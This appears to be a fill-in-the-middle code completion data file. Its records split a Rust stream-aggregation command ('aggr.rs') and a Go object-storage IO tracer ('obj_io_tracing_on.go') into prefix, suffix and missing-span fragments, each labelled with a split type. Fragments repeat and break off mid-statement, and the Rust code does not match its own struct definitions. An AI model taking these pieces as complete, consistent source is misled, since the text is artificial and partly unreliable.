let rest_output = uninit_rest_output.initialize(rest_output_type)?;
let rest_input = uninit_rest_input.initialize()?;
for (name, idx, c) in config.output_definition.iter() {
aggregator_handles.push(create_aggregator(
name.as_str(),
*idx,
c,
job_output.get_type(),
&mut uninitialized_inputs,
&mut outputs,
env,
printer)?);
}
let collector_handle = create_collector(
rest_input,
uninitialized_inputs,
writer_output.clone());
rest_output.send(row)?;
drop(rest_output);
pump_table(job_output, outputs, &config.output_definition)?;
for h in aggregator_handles {
h.join(printer);
}
collector_handle.join(printer);
Ok(())
}
pub fn
|
(config: Config, printer: &Printer, env: &Env, mut input: impl Readable, uninitialized_output: ValueSender) -> JobResult<()> {
let (writer_output, writer_input) = bounded::<Row>(16);
let mut output_names = input.get_type().iter().map(|t| t.name.clone()).collect::<Vec<Option<String>>>();
output_names.remove(config.table_idx);
for (name, _, _) in &config.output_definition {
output_names.push(Some(name.clone()));
}
let writer_handle = create_writer(uninitialized_output, output_names, writer_input);
loop {
match input.recv() {
Ok(mut row) => {
let table_cell = row.cells.remove(config.table_idx);
match table_cell {
Value::Output(mut job_output) =>
handle_row(row, &config, &mut job_output.stream, printer, env, &input, &writer_output)?,
Value::Rows(mut rows) =>
handle_row(row, &config, &mut RowsReader::new(rows), printer, env, &input, &writer_output)?,
_ => {
printer.job_error(error("Wrong column type"));
break;
}
}
}
Err(_) => { break; }
}
}
drop(writer_output);
writer_handle.join(printer);
Ok(())
}
fn perform_on(arguments:
|
run
|
identifier_name
|
aggr.rs
|
, argument_error, mandate, error};
use crate::lib::command_util::{find_field, find_field_from_str};
use crate::lang::printer::Printer;
use crossbeam::{Receiver, bounded, unbounded, Sender};
use crate::util::thread::{handle, build};
struct Aggregation {
idx: usize,
name: String,
command: Closure,
}
pub struct Config {
table_idx: usize,
aggregations: Vec<Aggregation>,
}
pub fn parse(input_type: &[ColumnType], argument: Vec<Argument>) -> CrushResult<Config> {
let mut table=None;
let mut aggregations = Vec::new();
let mut next_idx = input_type.len();
for a in &argument {
match (a.name.as_deref(), a.value) {
(Some("column"), Value::Field(name)) => {
table = Some(find_field(name.as_ref(), input_type)?);
}
(Some(name), Value::Closure(command)) => {
aggregations.push(
Aggregation {
command,
name: Box::from(name),
idx: find_field_from_str(name, input_type)
.unwrap_or_else(|| {next_idx += 1; next_idx - 1})
}
)
}
_ => return argument_error("Bad argument"),
}
}
Ok(Config {
table_idx: mandate(table, "Missing table spec")?,
aggregations,
})
/*
if argument.len() < 2 {
return Err(argument_error("Expected at least two paramaters"));
}
let (table_idx, aggregations) = match (argument.len() % 2, argument[0].name.is_none(), &argument[0].value) {
(0, false, _) => (guess_table(input_type)?, &argument[..]),
(1, true, Value::Field(f)) => (find_field(&f, input_type)?, &argument[1..]),
_ => return Err(argument_error("Could not find table to aggregate")),
};
match &input_type[table_idx].cell_type {
ValueType::Rows(sub_type) |
ValueType::Output(sub_type) => {
let output_definition = aggregations
.chunks(2)
.into_iter()
.map(|args| {
let spec = &args[0];
let clos = &args[1];
match (&spec.name, &spec.value, &clos.value) {
(Some(name), Value::Field(f), Value::Closure(c)) =>
Ok((
name.to_string(),
find_field(&f, sub_type)?,
c.clone()
)),
_ => Err(error("Invalid aggragation spec")),
}
})
.collect::<JobResult<Vec<(String, usize, Closure)>>>()?;
Ok(Config {
table_idx,
output_definition,
})
}
_ => {
Err(argument_error("No table to aggregate on found"))
}
}
*/
}
/*
pub fn guess_table(input_type: &[ColumnType]) -> JobResult<usize> {
let tables: Vec<usize> = input_type
.iter()
.enumerate()
.flat_map(|(idx, t)| {
match &t.cell_type {
ValueType::Output(_) | ValueType::Rows(_) => Some(idx),
_ => None,
}
}).collect();
if tables.len() == 1 {
Ok(tables[0])
} else {
Err(argument_error(format!("Could not guess tables to join, expected one table, found {}", tables.len()).as_str()))
}
}
*/
fn create_writer(
uninitialized_output: ValueSender,
mut output_names: Vec<Option<String>>,
writer_input: Receiver<Row>) ->
JobJoinHandle {
handle(build("aggr-writer".to_string()).spawn(
move || {
let output = match writer_input.recv() {
Ok(row) => {
let tmp = uninitialized_output.initialize(
row.cells
.iter()
.enumerate()
.map(|(idx, cell)| ColumnType { name: output_names[idx].take(), cell_type: cell.value_type() })
.collect()
)?;
tmp.send(row);
tmp
}
Err(_) => return Err(error("No output")),
};
loop {
match writer_input.recv() {
Ok(row) => {
output.send(row);
}
Err(_) => break,
}
}
Ok(())
}))
}
pub fn create_collector(
rest_input: InputStream,
uninitialized_inputs: Vec<ValueReceiver>,
writer_output: Sender<Row>) -> JobJoinHandle {
handle(build("aggr-collector".to_string()).spawn(
move || {
match rest_input.recv() {
Ok(mut partial_row) => {
for ui in uninitialized_inputs {
let i = ui.initialize_stream()?;
match i.recv() {
Ok(mut r) => {
partial_row.cells.push(std::mem::replace(&mut r.cells[0], Value::Integer(0)));
}
Err(_) => return Err(error("Missing value")),
}
}
writer_output.send(partial_row);
}
Err(_) => {}
}
|
}))
}
pub fn pump_table(
job_output: &mut impl Readable,
outputs: Vec<OutputStream>,
output_definition: &Vec<(String, usize, Closure)>) -> JobResult<()> {
let stream_to_column_mapping = output_definition.iter().map(|(_, off, _)| *off).collect::<Vec<usize>>();
loop {
match job_output.read() {
Ok(mut inner_row) => {
for stream_idx in 0..stream_to_column_mapping.len() {
outputs[stream_idx].send(Row { cells: vec![inner_row.cells.replace(stream_to_column_mapping[stream_idx], Value::Integer(0))] })?;
}
}
Err(_) => break,
}
}
Ok(())
}
fn create_aggregator(
name: &str,
idx: usize,
c: &Closure,
input_type: &[ColumnType],
uninitialized_inputs: &mut Vec<ValueReceiver>,
outputs: &mut Vec<OutputStream>,
env: &Env,
printer: &Printer) -> JobResult<JobJoinHandle> {
let (first_output, first_input) = streams(vec![
ColumnType::named(name, input_type[idx].value_type.clone())
]);
let (last_output, last_input) = streams();
outputs.push(first_output);
uninitialized_inputs.push(last_input);
let local_printer = printer.clone();
let local_env = env.clone();
let cc = c.clone();
Ok(handle(build("aggr-aggregator".to_string()).spawn(
move || {
cc.spawn_and_execute(CompileContext {
input: first_input,
output: last_output,
arguments: vec![],
env: local_env,
printer: local_printer,
});
Ok(())
})))
}
fn handle_row(
row: Row,
config: &Config,
job_output: &mut impl Readable,
printer: &Printer,
env: &Env,
input: &InputStream,
writer_output: &Sender<Row>) -> JobResult<()> {
let mut outputs: Vec<OutputStream> = Vec::new();
let mut uninitialized_inputs: Vec<ValueReceiver> = Vec::new();
let mut aggregator_handles: Vec<JobJoinHandle> = Vec::new();
let (uninit_rest_output, uninit_rest_input) = streams();
let mut rest_output_type = input.get_type().clone();
rest_output_type.remove(config.table_idx);
let rest_output = uninit_rest_output.initialize(rest_output_type)?;
let rest_input = uninit_rest_input.initialize()?;
for (name, idx, c) in config.output_definition.iter() {
aggregator_handles.push(create_aggregator(
name.as_str(),
*idx,
c,
job_output.get_type(),
&mut uninitialized_inputs,
&mut outputs,
env,
printer)?);
}
let collector_handle = create_collector(
rest_input,
uninitialized_inputs,
writer_output.clone());
rest_output.send(row)?;
drop(rest_output);
pump_table(job_output, outputs, &config.output_definition)?;
for h in aggregator_handles {
h.join(printer);
}
collector_handle.join(printer);
Ok(())
}
pub fn run(config: Config, printer: &Printer, env: &Env, mut input: impl Readable, uninitialized_output: ValueSender) -> JobResult<()> {
let (writer_output, writer_input) = bounded::<Row>(16);
let mut output_names = input.get_type().iter().map(|t| t.name.clone()).collect::<Vec<Option<String>>>();
output_names.remove(config.table_idx);
for (name, _, _) in &config.output_definition {
output_names.push(Some(name.clone()));
}
let writer_handle = create_writer(uninitialized_output, output_names, writer_input);
loop {
match input.recv() {
Ok(mut row) => {
let table_cell = row.cells.remove(config.table_idx);
match table_cell {
Value::Output(mut job_output) =>
handle_row(row, &config, &mut job_output.stream, printer, env, &input, &writer_output)?,
Value::Rows(mut rows) =>
handle_row(row, &config, &mut RowsReader::new(rows), printer, env, &input, &writer_output)?,
_ => {
printer.job_error(error("Wrong column type"));
break;
}
}
}
Err(_) => { break; }
}
}
drop(writer_output);
writer_handle.join(printer);
Ok(())
}
fn perform_on(arguments:
|
Ok(())
|
random_line_split
|
obj_io_tracing_on.go
|
traces;
// they maintain internal buffers of events which get flushed to the buffered
// channel when they get full. This allows for minimal synchronization per IO
// (as for most of these structures, an instance only allows a single IO at a
// time).
type Tracer struct {
fs vfs.FS
fsDir string
handleID atomic.Uint64
workerStopCh chan struct{}
workerDataCh chan eventBuf
workerWait sync.WaitGroup
}
// Open creates a Tracer which generates trace files in the given directory.
// Each trace file contains a series of Events (as they are in memory).
func Open(fs vfs.FS, fsDir string) *Tracer {
t := &Tracer{
fs: fs,
fsDir: fsDir,
workerStopCh: make(chan struct{}),
workerDataCh: make(chan eventBuf, channelBufSize),
}
t.handleID.Store(uint64(rand.NewSource(time.Now().UnixNano()).Int63()))
t.workerWait.Add(1)
go t.workerLoop()
return t
}
// Close the tracer, flushing any remaining events.
func (t *Tracer) Close() {
if t.workerStopCh == nil {
return
}
// Tell the worker to stop and wait for it to finish up.
close(t.workerStopCh)
t.workerWait.Wait()
t.workerStopCh = nil
}
// WrapWritable wraps an objstorage.Writable with one that generates tracing
// events.
func (t *Tracer) WrapWritable(
ctx context.Context, w objstorage.Writable, fileNum base.FileNum,
) objstorage.Writable {
return &writable{
w: w,
fileNum: fileNum,
g: makeEventGenerator(ctx, t),
}
}
type writable struct {
w objstorage.Writable
fileNum base.FileNum
curOffset int64
g eventGenerator
}
var _ objstorage.Writable = (*writable)(nil)
// Write is part of the objstorage.Writable interface.
func (w *writable) Write(p []byte) error {
w.g.add(context.Background(), Event{
Op: WriteOp,
FileNum: w.fileNum,
Offset: w.curOffset,
Size: int64(len(p)),
})
// If w.w.Write(p) returns an error, a new writable
// will be used, so even tho all of p may not have
// been written to the underlying "file", it is okay
// to add len(p) to curOffset.
w.curOffset += int64(len(p))
return w.w.Write(p)
}
// Finish is part of the objstorage.Writable interface.
func (w *writable) Finish() error {
w.g.flush()
return w.w.Finish()
}
// Abort is part of the objstorage.Writable interface.
func (w *writable) Abort() {
w.g.flush()
w.w.Abort()
}
// WrapReadable wraps an objstorage.Readable with one that generates tracing
// events.
func (t *Tracer) WrapReadable(
ctx context.Context, r objstorage.Readable, fileNum base.FileNum,
) objstorage.Readable {
res := &readable{
r: r,
fileNum: fileNum,
}
res.mu.g = makeEventGenerator(ctx, t)
return res
}
type readable struct {
r objstorage.Readable
fileNum base.FileNum
mu struct {
sync.Mutex
g eventGenerator
}
}
var _ objstorage.Readable = (*readable)(nil)
// ReadAt is part of the objstorage.Readable interface.
func (r *readable) ReadAt(ctx context.Context, v []byte, off int64) (n int, err error) {
r.mu.Lock()
r.mu.g.add(ctx, Event{
Op: ReadOp,
FileNum: r.fileNum,
Offset: off,
Size: int64(len(v)),
})
r.mu.Unlock()
return r.r.ReadAt(ctx, v, off)
}
// Close is part of the objstorage.Readable interface.
func (r *readable) Close() error {
r.mu.g.flush()
return r.r.Close()
}
// Size is part of the objstorage.Readable interface.
func (r *readable) Size() int64 {
return r.r.Size()
}
// NewReadHandle is part of the objstorage.Readable interface.
func (r *readable) NewReadHandle(ctx context.Context) objstorage.ReadHandle {
// It's safe to get the tracer from the generator without the mutex since it never changes.
t := r.mu.g.t
return &readHandle{
rh: r.r.NewReadHandle(ctx),
fileNum: r.fileNum,
handleID: t.handleID.Add(1),
g: makeEventGenerator(ctx, t),
}
}
type readHandle struct {
rh objstorage.ReadHandle
fileNum base.FileNum
handleID uint64
g eventGenerator
}
var _ objstorage.ReadHandle = (*readHandle)(nil)
// ReadAt is part of the objstorage.ReadHandle interface.
func (rh *readHandle) ReadAt(ctx context.Context, p []byte, off int64) (n int, err error) {
rh.g.add(ctx, Event{
Op: ReadOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: off,
Size: int64(len(p)),
})
return rh.rh.ReadAt(ctx, p, off)
}
// Close is part of the objstorage.ReadHandle interface.
func (rh *readHandle) Close() error {
rh.g.flush()
return rh.rh.Close()
}
// SetupForCompaction is part of the objstorage.ReadHandle interface.
func (rh *readHandle) SetupForCompaction() {
rh.g.add(context.Background(), Event{
Op: SetupForCompactionOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
})
rh.rh.SetupForCompaction()
}
// RecordCacheHit is part of the objstorage.ReadHandle interface.
func (rh *readHandle)
|
(ctx context.Context, offset, size int64) {
rh.g.add(ctx, Event{
Op: RecordCacheHitOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: offset,
Size: size,
})
rh.rh.RecordCacheHit(ctx, offset, size)
}
type ctxInfo struct {
reason Reason
blockType BlockType
levelPlusOne uint8
}
func mergeCtxInfo(base, other ctxInfo) ctxInfo {
res := other
if res.reason == 0 {
res.reason = base.reason
}
if res.blockType == 0 {
res.blockType = base.blockType
}
if res.levelPlusOne == 0 {
res.levelPlusOne = base.levelPlusOne
}
return res
}
type ctxInfoKey struct{}
func withInfo(ctx context.Context, info ctxInfo) context.Context {
return context.WithValue(ctx, ctxInfoKey{}, info)
}
func infoFromCtx(ctx context.Context) ctxInfo {
res := ctx.Value(ctxInfoKey{})
if res == nil {
return ctxInfo{}
}
return res.(ctxInfo)
}
// WithReason creates a context that has an associated Reason (which ends up in
// traces created under that context).
func WithReason(ctx context.Context, reason Reason) context.Context {
info := infoFromCtx(ctx)
info.reason = reason
return withInfo(ctx, info)
}
// WithBlockType creates a context that has an associated BlockType (which ends up in
// traces created under that context).
func WithBlockType(ctx context.Context, blockType BlockType) context.Context {
info := infoFromCtx(ctx)
info.blockType = blockType
return withInfo(ctx, info)
}
// WithLevel creates a context that has an associated level (which ends up in
// traces created under that context).
func WithLevel(ctx context.Context, level int) context.Context {
info := infoFromCtx(ctx)
info.levelPlusOne = uint8(level) + 1
return withInfo(ctx, info)
}
const (
eventSize = int(unsafe.Sizeof(Event{}))
targetEntriesPerFile = 256 * 1024 * 1024 / eventSize // 256MB files
eventsPerBuf = 16
channelBufSize = 512 * 1024 / eventsPerBuf // 512K events.
bytesPerFileSync = 128 * 1024
)
type eventBuf struct {
events [eventsPerBuf]Event
num int
}
type eventGenerator struct {
t *Tracer
baseCtxInfo ctxInfo
buf eventBuf
}
func makeEventGenerator(ctx context.Context, t *Tracer) eventGenerator {
return eventGenerator{
t: t,
baseCtxInfo: infoFromCtx(ctx),
}
}
func (g *eventGenerator) flush() {
if g.buf.num > 0 {
g.t.workerDataCh <- g.buf
g.buf.num = 0
}
}
func (g *eventGenerator) add(ctx context.Context, e Event) {
e.StartUnixNano = time.Now().UnixNano()
info := infoFromCtx(ctx)
info = mergeCtxInfo(g.baseCtxInfo, info)
e.Reason = info.reason
e.Block
|
RecordCacheHit
|
identifier_name
|
obj_io_tracing_on.go
|
traces;
// they maintain internal buffers of events which get flushed to the buffered
// channel when they get full. This allows for minimal synchronization per IO
// (as for most of these structures, an instance only allows a single IO at a
// time).
type Tracer struct {
fs vfs.FS
fsDir string
handleID atomic.Uint64
workerStopCh chan struct{}
workerDataCh chan eventBuf
workerWait sync.WaitGroup
}
// Open creates a Tracer which generates trace files in the given directory.
// Each trace file contains a series of Events (as they are in memory).
func Open(fs vfs.FS, fsDir string) *Tracer {
t := &Tracer{
fs: fs,
fsDir: fsDir,
workerStopCh: make(chan struct{}),
workerDataCh: make(chan eventBuf, channelBufSize),
}
t.handleID.Store(uint64(rand.NewSource(time.Now().UnixNano()).Int63()))
t.workerWait.Add(1)
go t.workerLoop()
return t
}
// Close the tracer, flushing any remaining events.
func (t *Tracer) Close() {
if t.workerStopCh == nil {
return
}
// Tell the worker to stop and wait for it to finish up.
close(t.workerStopCh)
t.workerWait.Wait()
t.workerStopCh = nil
}
// WrapWritable wraps an objstorage.Writable with one that generates tracing
|
w: w,
fileNum: fileNum,
g: makeEventGenerator(ctx, t),
}
}
type writable struct {
w objstorage.Writable
fileNum base.FileNum
curOffset int64
g eventGenerator
}
var _ objstorage.Writable = (*writable)(nil)
// Write is part of the objstorage.Writable interface.
func (w *writable) Write(p []byte) error {
w.g.add(context.Background(), Event{
Op: WriteOp,
FileNum: w.fileNum,
Offset: w.curOffset,
Size: int64(len(p)),
})
// If w.w.Write(p) returns an error, a new writable
// will be used, so even tho all of p may not have
// been written to the underlying "file", it is okay
// to add len(p) to curOffset.
w.curOffset += int64(len(p))
return w.w.Write(p)
}
// Finish is part of the objstorage.Writable interface.
func (w *writable) Finish() error {
w.g.flush()
return w.w.Finish()
}
// Abort is part of the objstorage.Writable interface.
func (w *writable) Abort() {
w.g.flush()
w.w.Abort()
}
// WrapReadable wraps an objstorage.Readable with one that generates tracing
// events.
func (t *Tracer) WrapReadable(
ctx context.Context, r objstorage.Readable, fileNum base.FileNum,
) objstorage.Readable {
res := &readable{
r: r,
fileNum: fileNum,
}
res.mu.g = makeEventGenerator(ctx, t)
return res
}
type readable struct {
r objstorage.Readable
fileNum base.FileNum
mu struct {
sync.Mutex
g eventGenerator
}
}
var _ objstorage.Readable = (*readable)(nil)
// ReadAt is part of the objstorage.Readable interface.
func (r *readable) ReadAt(ctx context.Context, v []byte, off int64) (n int, err error) {
r.mu.Lock()
r.mu.g.add(ctx, Event{
Op: ReadOp,
FileNum: r.fileNum,
Offset: off,
Size: int64(len(v)),
})
r.mu.Unlock()
return r.r.ReadAt(ctx, v, off)
}
// Close is part of the objstorage.Readable interface.
func (r *readable) Close() error {
r.mu.g.flush()
return r.r.Close()
}
// Size is part of the objstorage.Readable interface.
func (r *readable) Size() int64 {
return r.r.Size()
}
// NewReadHandle is part of the objstorage.Readable interface.
func (r *readable) NewReadHandle(ctx context.Context) objstorage.ReadHandle {
// It's safe to get the tracer from the generator without the mutex since it never changes.
t := r.mu.g.t
return &readHandle{
rh: r.r.NewReadHandle(ctx),
fileNum: r.fileNum,
handleID: t.handleID.Add(1),
g: makeEventGenerator(ctx, t),
}
}
type readHandle struct {
rh objstorage.ReadHandle
fileNum base.FileNum
handleID uint64
g eventGenerator
}
var _ objstorage.ReadHandle = (*readHandle)(nil)
// ReadAt is part of the objstorage.ReadHandle interface.
func (rh *readHandle) ReadAt(ctx context.Context, p []byte, off int64) (n int, err error) {
rh.g.add(ctx, Event{
Op: ReadOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: off,
Size: int64(len(p)),
})
return rh.rh.ReadAt(ctx, p, off)
}
// Close is part of the objstorage.ReadHandle interface.
func (rh *readHandle) Close() error {
rh.g.flush()
return rh.rh.Close()
}
// SetupForCompaction is part of the objstorage.ReadHandle interface.
func (rh *readHandle) SetupForCompaction() {
rh.g.add(context.Background(), Event{
Op: SetupForCompactionOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
})
rh.rh.SetupForCompaction()
}
// RecordCacheHit is part of the objstorage.ReadHandle interface.
func (rh *readHandle) RecordCacheHit(ctx context.Context, offset, size int64) {
rh.g.add(ctx, Event{
Op: RecordCacheHitOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: offset,
Size: size,
})
rh.rh.RecordCacheHit(ctx, offset, size)
}
type ctxInfo struct {
reason Reason
blockType BlockType
levelPlusOne uint8
}
func mergeCtxInfo(base, other ctxInfo) ctxInfo {
res := other
if res.reason == 0 {
res.reason = base.reason
}
if res.blockType == 0 {
res.blockType = base.blockType
}
if res.levelPlusOne == 0 {
res.levelPlusOne = base.levelPlusOne
}
return res
}
type ctxInfoKey struct{}
func withInfo(ctx context.Context, info ctxInfo) context.Context {
return context.WithValue(ctx, ctxInfoKey{}, info)
}
func infoFromCtx(ctx context.Context) ctxInfo {
res := ctx.Value(ctxInfoKey{})
if res == nil {
return ctxInfo{}
}
return res.(ctxInfo)
}
// WithReason creates a context that has an associated Reason (which ends up in
// traces created under that context).
func WithReason(ctx context.Context, reason Reason) context.Context {
info := infoFromCtx(ctx)
info.reason = reason
return withInfo(ctx, info)
}
// WithBlockType creates a context that has an associated BlockType (which ends up in
// traces created under that context).
func WithBlockType(ctx context.Context, blockType BlockType) context.Context {
info := infoFromCtx(ctx)
info.blockType = blockType
return withInfo(ctx, info)
}
// WithLevel creates a context that has an associated level (which ends up in
// traces created under that context).
func WithLevel(ctx context.Context, level int) context.Context {
info := infoFromCtx(ctx)
info.levelPlusOne = uint8(level) + 1
return withInfo(ctx, info)
}
const (
eventSize = int(unsafe.Sizeof(Event{}))
targetEntriesPerFile = 256 * 1024 * 1024 / eventSize // 256MB files
eventsPerBuf = 16
channelBufSize = 512 * 1024 / eventsPerBuf // 512K events.
bytesPerFileSync = 128 * 1024
)
type eventBuf struct {
events [eventsPerBuf]Event
num int
}
type eventGenerator struct {
t *Tracer
baseCtxInfo ctxInfo
buf eventBuf
}
func makeEventGenerator(ctx context.Context, t *Tracer) eventGenerator {
return eventGenerator{
t: t,
baseCtxInfo: infoFromCtx(ctx),
}
}
func (g *eventGenerator) flush() {
if g.buf.num > 0 {
g.t.workerDataCh <- g.buf
g.buf.num = 0
}
}
func (g *eventGenerator) add(ctx context.Context, e Event) {
e.StartUnixNano = time.Now().UnixNano()
info := infoFromCtx(ctx)
info = mergeCtxInfo(g.baseCtxInfo, info)
e.Reason = info.reason
e.BlockType =
|
// events.
func (t *Tracer) WrapWritable(
ctx context.Context, w objstorage.Writable, fileNum base.FileNum,
) objstorage.Writable {
return &writable{
|
random_line_split
|
obj_io_tracing_on.go
|
.fileNum,
Offset: w.curOffset,
Size: int64(len(p)),
})
// If w.w.Write(p) returns an error, a new writable
// will be used, so even tho all of p may not have
// been written to the underlying "file", it is okay
// to add len(p) to curOffset.
w.curOffset += int64(len(p))
return w.w.Write(p)
}
// Finish is part of the objstorage.Writable interface.
func (w *writable) Finish() error {
w.g.flush()
return w.w.Finish()
}
// Abort is part of the objstorage.Writable interface.
func (w *writable) Abort() {
w.g.flush()
w.w.Abort()
}
// WrapReadable wraps an objstorage.Readable with one that generates tracing
// events.
func (t *Tracer) WrapReadable(
ctx context.Context, r objstorage.Readable, fileNum base.FileNum,
) objstorage.Readable {
res := &readable{
r: r,
fileNum: fileNum,
}
res.mu.g = makeEventGenerator(ctx, t)
return res
}
type readable struct {
r objstorage.Readable
fileNum base.FileNum
mu struct {
sync.Mutex
g eventGenerator
}
}
var _ objstorage.Readable = (*readable)(nil)
// ReadAt is part of the objstorage.Readable interface.
func (r *readable) ReadAt(ctx context.Context, v []byte, off int64) (n int, err error) {
r.mu.Lock()
r.mu.g.add(ctx, Event{
Op: ReadOp,
FileNum: r.fileNum,
Offset: off,
Size: int64(len(v)),
})
r.mu.Unlock()
return r.r.ReadAt(ctx, v, off)
}
// Close is part of the objstorage.Readable interface.
func (r *readable) Close() error {
r.mu.g.flush()
return r.r.Close()
}
// Size is part of the objstorage.Readable interface.
func (r *readable) Size() int64 {
return r.r.Size()
}
// NewReadHandle is part of the objstorage.Readable interface.
func (r *readable) NewReadHandle(ctx context.Context) objstorage.ReadHandle {
// It's safe to get the tracer from the generator without the mutex since it never changes.
t := r.mu.g.t
return &readHandle{
rh: r.r.NewReadHandle(ctx),
fileNum: r.fileNum,
handleID: t.handleID.Add(1),
g: makeEventGenerator(ctx, t),
}
}
type readHandle struct {
rh objstorage.ReadHandle
fileNum base.FileNum
handleID uint64
g eventGenerator
}
var _ objstorage.ReadHandle = (*readHandle)(nil)
// ReadAt is part of the objstorage.ReadHandle interface.
func (rh *readHandle) ReadAt(ctx context.Context, p []byte, off int64) (n int, err error) {
rh.g.add(ctx, Event{
Op: ReadOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: off,
Size: int64(len(p)),
})
return rh.rh.ReadAt(ctx, p, off)
}
// Close is part of the objstorage.ReadHandle interface.
func (rh *readHandle) Close() error {
rh.g.flush()
return rh.rh.Close()
}
// SetupForCompaction is part of the objstorage.ReadHandle interface.
func (rh *readHandle) SetupForCompaction() {
rh.g.add(context.Background(), Event{
Op: SetupForCompactionOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
})
rh.rh.SetupForCompaction()
}
// RecordCacheHit is part of the objstorage.ReadHandle interface.
func (rh *readHandle) RecordCacheHit(ctx context.Context, offset, size int64) {
rh.g.add(ctx, Event{
Op: RecordCacheHitOp,
FileNum: rh.fileNum,
HandleID: rh.handleID,
Offset: offset,
Size: size,
})
rh.rh.RecordCacheHit(ctx, offset, size)
}
type ctxInfo struct {
reason Reason
blockType BlockType
levelPlusOne uint8
}
func mergeCtxInfo(base, other ctxInfo) ctxInfo {
res := other
if res.reason == 0 {
res.reason = base.reason
}
if res.blockType == 0 {
res.blockType = base.blockType
}
if res.levelPlusOne == 0 {
res.levelPlusOne = base.levelPlusOne
}
return res
}
type ctxInfoKey struct{}
func withInfo(ctx context.Context, info ctxInfo) context.Context {
return context.WithValue(ctx, ctxInfoKey{}, info)
}
func infoFromCtx(ctx context.Context) ctxInfo {
res := ctx.Value(ctxInfoKey{})
if res == nil {
return ctxInfo{}
}
return res.(ctxInfo)
}
// WithReason creates a context that has an associated Reason (which ends up in
// traces created under that context).
func WithReason(ctx context.Context, reason Reason) context.Context {
info := infoFromCtx(ctx)
info.reason = reason
return withInfo(ctx, info)
}
// WithBlockType creates a context that has an associated BlockType (which ends up in
// traces created under that context).
func WithBlockType(ctx context.Context, blockType BlockType) context.Context {
info := infoFromCtx(ctx)
info.blockType = blockType
return withInfo(ctx, info)
}
// WithLevel creates a context that has an associated level (which ends up in
// traces created under that context).
func WithLevel(ctx context.Context, level int) context.Context {
info := infoFromCtx(ctx)
info.levelPlusOne = uint8(level) + 1
return withInfo(ctx, info)
}
const (
eventSize = int(unsafe.Sizeof(Event{}))
targetEntriesPerFile = 256 * 1024 * 1024 / eventSize // 256MB files
eventsPerBuf = 16
channelBufSize = 512 * 1024 / eventsPerBuf // 512K events.
bytesPerFileSync = 128 * 1024
)
type eventBuf struct {
events [eventsPerBuf]Event
num int
}
type eventGenerator struct {
t *Tracer
baseCtxInfo ctxInfo
buf eventBuf
}
func makeEventGenerator(ctx context.Context, t *Tracer) eventGenerator {
return eventGenerator{
t: t,
baseCtxInfo: infoFromCtx(ctx),
}
}
func (g *eventGenerator) flush() {
if g.buf.num > 0 {
g.t.workerDataCh <- g.buf
g.buf.num = 0
}
}
func (g *eventGenerator) add(ctx context.Context, e Event) {
e.StartUnixNano = time.Now().UnixNano()
info := infoFromCtx(ctx)
info = mergeCtxInfo(g.baseCtxInfo, info)
e.Reason = info.reason
e.BlockType = info.blockType
e.LevelPlusOne = info.levelPlusOne
if g.buf.num == eventsPerBuf {
g.flush()
}
g.buf.events[g.buf.num] = e
g.buf.num++
}
type workerState struct {
curFile vfs.File
curBW *bufio.Writer
numEntriesInFile int
}
func (t *Tracer) workerLoop() {
defer t.workerWait.Done()
stopCh := t.workerStopCh
dataCh := t.workerDataCh
var state workerState
t.workerNewFile(&state)
for {
select {
case <-stopCh:
close(dataCh)
// Flush any remaining traces.
for data := range dataCh {
t.workerWriteTraces(&state, data)
}
t.workerCloseFile(&state)
return
case data := <-dataCh:
t.workerWriteTraces(&state, data)
}
}
}
func (t *Tracer) workerWriteTraces(state *workerState, data eventBuf) {
if state.numEntriesInFile >= targetEntriesPerFile {
t.workerCloseFile(state)
t.workerNewFile(state)
}
state.numEntriesInFile += data.num
p := unsafe.Pointer(&data.events[0])
b := unsafe.Slice((*byte)(p), eventSize*data.num)
if _, err := state.curBW.Write(b); err != nil {
panic(err)
}
}
func (t *Tracer) workerNewFile(state *workerState) {
filename := fmt.Sprintf("IOTRACES-%s", time.Now().UTC().Format(time.RFC3339Nano))
file, err := t.fs.Create(t.fs.PathJoin(t.fsDir, filename))
if err != nil {
panic(err)
}
file = vfs.NewSyncingFile(file, vfs.SyncingFileOptions{
BytesPerSync: bytesPerFileSync,
})
state.curFile = file
state.curBW = bufio.NewWriter(file)
state.numEntriesInFile = 0
}
func (t *Tracer) workerCloseFile(state *workerState) {
if state.curFile != nil {
if err := state.curBW.Flush(); err != nil
|
{
panic(err)
}
|
conditional_block
|
|
obj_io_tracing_on.go
|
;
// they maintain internal buffers of events which get flushed to the buffered
// channel when they get full. This allows for minimal synchronization per IO
// (as for most of these structures, an instance only allows a single IO at a
// time).
type Tracer struct {
fs vfs.FS
fsDir string
handleID atomic.Uint64
workerStopCh chan struct{}
workerDataCh chan eventBuf
workerWait sync.WaitGroup
}
// Open creates a Tracer which generates trace files in the given directory.
// Each trace file contains a series of Events (as they are in memory).
func Open(fs vfs.FS, fsDir string) *Tracer {
t := &Tracer{
fs: fs,
fsDir: fsDir,
workerStopCh: make(chan struct{}),
workerDataCh: make(chan eventBuf, channelBufSize),
}
t.handleID.Store(uint64(rand.NewSource(time.Now().UnixNano()).Int63()))
t.workerWait.Add(1)
go t.workerLoop()
return t
}
// Close the tracer, flushing any remaining events.
func (t *Tracer) Close() {
if t.workerStopCh == nil {
return
}
// Tell the worker to stop and wait for it to finish up.
close(t.workerStopCh)
t.workerWait.Wait()
t.workerStopCh = nil
}
// WrapWritable wraps an objstorage.Writable with one that generates tracing
// events.
func (t *Tracer) WrapWritable(
ctx context.Context, w objstorage.Writable, fileNum base.FileNum,
) objstorage.Writable {
return &writable{
w: w,
fileNum: fileNum,
g: makeEventGenerator(ctx, t),
}
}
type writable struct {
w objstorage.Writable
fileNum base.FileNum
curOffset int64
g eventGenerator
}
var _ objstorage.Writable = (*writable)(nil)
// Write is part of the objstorage.Writable interface.
func (w *writable) Write(p []byte) error {
w.g.add(context.Background(), Event{
Op: WriteOp,
FileNum: w.fileNum,
Offset: w.curOffset,
Size: int64(len(p)),
})
// If w.w.Write(p) returns an error, a new writable
// will be used, so even tho all of p may not have
// been written to the underlying "file", it is okay
// to add len(p) to curOffset.
w.curOffset += int64(len(p))
return w.w.Write(p)
}
// Finish is part of the objstorage.Writable interface.
